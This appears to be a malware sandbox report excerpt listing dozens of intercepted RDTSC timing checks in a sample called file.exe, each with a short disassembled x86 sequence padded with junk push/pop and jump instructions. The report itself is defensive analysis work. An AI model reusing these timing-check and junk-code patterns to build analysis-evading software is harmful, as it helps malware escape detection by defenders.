                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532A5B second address: 532A9E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2AF93CAABCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 jl 00007F2AF93CAAC2h 0x00000018 jmp 00007F2AF93CAABCh 0x0000001d popad 0x0000001e xchg eax, esi 0x0000001f mov dword ptr [ebp+122D2162h], ecx 0x00000025 pushad 0x00000026 mov bh, A7h 0x00000028 mov esi, edi 0x0000002a popad 0x0000002b push eax 0x0000002c pushad 0x0000002d pushad 0x0000002e jp 00007F2AF93CAAB6h 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532A9E second address: 532AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F2AF86F4E9Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5335A2 second address: 5335A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 533699 second address: 53369D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53369D second address: 5336A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 574D0B second address: 574D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 574FD7 second address: 574FDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 574FDB second address: 574FF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF86F4E9Fh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 575733 second address: 575739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57F0AE second address: 57F0B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57DCD7 second address: 57DCEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AF93CAABFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57DE7B second address: 57DE8C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007F2AF86F4E96h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57DE8C second address: 57DE91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57DE91 second address: 57DE97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57DE97 second address: 57DE9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57DE9D second address: 57DEA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E14F second address: 57E159 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2AF93CAAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E2D9 second address: 57E312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jmp 00007F2AF86F4EA8h 0x0000000d jmp 00007F2AF86F4EA7h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E312 second address: 57E333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F2AF93CAABEh 0x0000000b jmp 00007F2AF93CAABCh 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E5A8 second address: 57E5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E5AE second address: 57E5B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E5B3 second address: 57E5BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EA0A second address: 57EA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2AF93CAAB6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EB43 second address: 57EB4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57EB4C second address: 57EB50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583B36 second address: 583B41 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583540 second address: 583546 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583546 second address: 58356F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2AF86F4EA3h 0x0000000c jmp 00007F2AF86F4E9Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583850 second address: 583871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jnl 00007F2AF93CAAB6h 0x0000000c jmp 00007F2AF93CAAC3h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583871 second address: 583876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583876 second address: 58387B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58387B second address: 583881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583881 second address: 58388B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE8B1 second address: 4EE8CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2AF86F4EA4h 0x00000009 jns 00007F2AF86F4E96h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE8CF second address: 4EE902 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2AF93CAAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jc 00007F2AF93CAAD3h 0x00000013 jl 00007F2AF93CAAB6h 0x00000019 jmp 00007F2AF93CAAC7h 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE902 second address: 4EE90D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE90D second address: 4EE911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE911 second address: 4EE915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B0AE second address: 58B0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F2AF93CAAC6h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B0CA second address: 58B0E9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2AF86F4E96h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2AF86F4E9Bh 0x00000013 jns 00007F2AF86F4E96h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B0E9 second address: 58B0F9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2AF93CAAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B0F9 second address: 58B0FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B0FD second address: 58B11E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F2AF93CAAC4h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B11E second address: 58B134 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2AF86F4E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jno 00007F2AF86F4E96h 0x00000011 push esi 0x00000012 pop esi 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B134 second address: 58B13E instructions: 0x00000000 rdtsc 0x00000002 je 00007F2AF93CAABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B454 second address: 58B45A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B45A second address: 58B463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B85D second address: 58B86E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F2AF86F4E9Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B86E second address: 58B87A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F2AF93CAAB6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58BA29 second address: 58BA2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58BA2F second address: 58BA33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58BBBA second address: 58BBC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58BBC0 second address: 58BBC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58BBC6 second address: 58BBD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2AF86F4E96h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F2AF86F4E96h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58F94C second address: 58F950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58F950 second address: 58F972 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF86F4EA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58F972 second address: 58F985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 jng 00007F2AF93CAAE3h 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58F985 second address: 58F9A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AF86F4E9Bh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jo 00007F2AF86F4E96h 0x00000015 jp 00007F2AF86F4E96h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58F1A3 second address: 58F1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2AF93CAAB6h 0x0000000a jmp 00007F2AF93CAAC2h 0x0000000f popad 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2AF93CAAC8h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58F1DB second address: 58F1EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F2AF86F4E9Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58F1EB second address: 58F202 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAAC3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 594463 second address: 594468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 593E73 second address: 593E77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 593E77 second address: 593E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AF86F4E9Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 593FEC second address: 594008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AF93CAAC8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 594008 second address: 59400E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59C59F second address: 59C5A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59C5A5 second address: 59C5AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59C5AB second address: 59C5B8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2AF93CAAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59A741 second address: 59A755 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2AF86F4E9Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F2AF86F4E96h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59A8AA second address: 59A8CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAAC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59ABA7 second address: 59ABAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59ABAD second address: 59ABB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59AE88 second address: 59AEA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AF86F4EA4h 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59AEA5 second address: 59AEB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2AF93CAAB6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59AEB8 second address: 59AEBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B70F second address: 59B719 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2AF93CAAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BCC3 second address: 59BCCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BCCB second address: 59BCCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BCCF second address: 59BCD5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BFCD second address: 59BFD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BFD2 second address: 59BFD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BFD8 second address: 59C043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jnl 00007F2AF93CAAD3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F2AF93CAABEh 0x00000018 pop edi 0x00000019 push eax 0x0000001a jmp 00007F2AF93CAAC7h 0x0000001f jmp 00007F2AF93CAABBh 0x00000024 pop eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jc 00007F2AF93CAAB6h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59F70E second address: 59F719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59F719 second address: 59F74A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AF93CAABAh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F2AF93CAAC3h 0x00000014 popad 0x00000015 pushad 0x00000016 jp 00007F2AF93CAAB6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59F74A second address: 59F750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59F8A2 second address: 59F8B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AF93CAABBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59F8B1 second address: 59F8CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF86F4EA1h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59F8CA second address: 59F8CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59FBDC second address: 59FC0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF86F4EA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2AF86F4EA1h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59FC0B second address: 59FC11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59FD87 second address: 59FD91 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2AF86F4EADh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC11D second address: 5AC121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC121 second address: 5AC127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC127 second address: 5AC13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 jc 00007F2AF93CAAB8h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC3B9 second address: 5AC3ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F2AF86F4EA3h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jnc 00007F2AF86F4E96h 0x00000015 jmp 00007F2AF86F4EA0h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC3ED second address: 5AC3FD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2AF93CAAC2h 0x00000008 jnp 00007F2AF93CAAB6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
